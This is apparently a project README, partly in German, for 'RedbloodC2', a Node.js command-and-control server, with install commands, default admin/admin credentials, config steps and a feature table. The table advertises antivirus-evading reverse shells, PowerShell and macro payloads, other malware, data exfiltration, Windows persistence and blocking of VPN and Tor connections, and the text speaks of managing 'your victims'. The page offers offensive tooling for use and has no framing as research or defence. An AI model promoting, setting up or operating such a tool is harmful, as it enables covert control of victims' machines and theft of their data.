
Node.js Command-and-Control-Server mit FUD-Payload-Generierung, verschlüsselter Kommunikation, Sitzungsverwaltung sowie Modulen zur Datenexfiltration und Windows-Persistenz.
This is a simple command and control server to handle sessions and your victims
$ git clone https://github.com/kira2040k/RedbloodC2.git
$ cd RedbloodC2
$ npm install
$ node server.js
After install node.js and and all modules from npm
execute:
node server.js
Now visit http://localhost/
username: admin
password: admin
| Funktion | vorhanden |
|---|---|
| FUD windows reverse shell 🐞 | ✔️ |
| admin panel 🛑 | ✔️ |
| web UI 📱 | ✔️ |
| FUD powershell payload 🐞 | ✔️ |
| FUD macro 🐞 | ✔️ |
| FUD other types of malware 🐞 | ✔️ |
| auto commands 🤖 | ✔️ |
| encrypt communication 🔐 | ✔️ |
| block vpn and tor connections 🧅 | ✔️ |
| manage users and sessions 📃 | ✔️ |
| Sessions chart 📊 | ❌ |
| FUD autoit shell | ✔️ |
| on connections commands | ✔️ |
| notes & obfuscate path | ✔️ |
| http/s reverse shell | ✔️ |
Sie können config.js bearbeiten, um die Kontrolle über Ihr C2 zu übernehmen.
Ändern Sie das Passwort des Admin-Kontos und fügen Sie in der .env-Datei Ihren ipdata-API-Schlüssel hinzu.
Ändern Sie das Token in der .env-Datei
$ node
> crypto.randomBytes(64).toString('hex');
dac771b25290f7a54ff628bdfc9a7e0de879d178a331b16cb65e7199b9d7ce2b7afb30f406415f3852704a0decba68a5c4859a81d29ee680e6427939fd8d99a2
